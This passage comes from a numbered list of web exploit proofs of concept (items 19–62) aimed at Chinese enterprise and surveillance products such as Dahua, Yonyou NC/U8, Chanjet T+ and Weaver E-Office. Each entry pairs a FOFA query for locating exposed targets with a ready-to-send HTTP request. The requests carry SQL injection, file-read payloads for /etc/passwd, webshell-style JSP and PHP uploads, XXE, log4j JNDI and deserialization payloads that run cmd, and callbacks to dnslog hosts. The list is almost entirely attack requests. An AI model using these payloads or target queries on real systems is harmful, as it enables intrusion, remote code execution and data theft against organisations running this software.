User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


20. Dahua ICC intelligent IoT management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua ICC intelligent IoT management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}


22. Dahua ICC intelligent IoT management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}


23. Dahua ICC intelligent IoT management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog


26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8


28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--


31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded


32. Yonyou NC complainbilldetail SQL injection
version= NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


33. Yonyou NC downTax/download SQL injection
version:NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--


36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a


37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>


38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>


39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--


40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>


41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close


42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>


44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest


46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close


48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--


49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1


51. 云时空 (Yunshikong) Social Commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333


53. DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd


54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: visit the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt


55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword interface
Step 2: use the obtained Cookie to request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}


57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD


60. Byzoro Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The sql parameter is base64: c2VsZWN0IDEsdXNlcigpLDM= decodes to select 1,user(),3, and the endpoint executes it and returns the rows as a spreadsheet.

61. Zheda Ente (Entsoft) customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa


62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
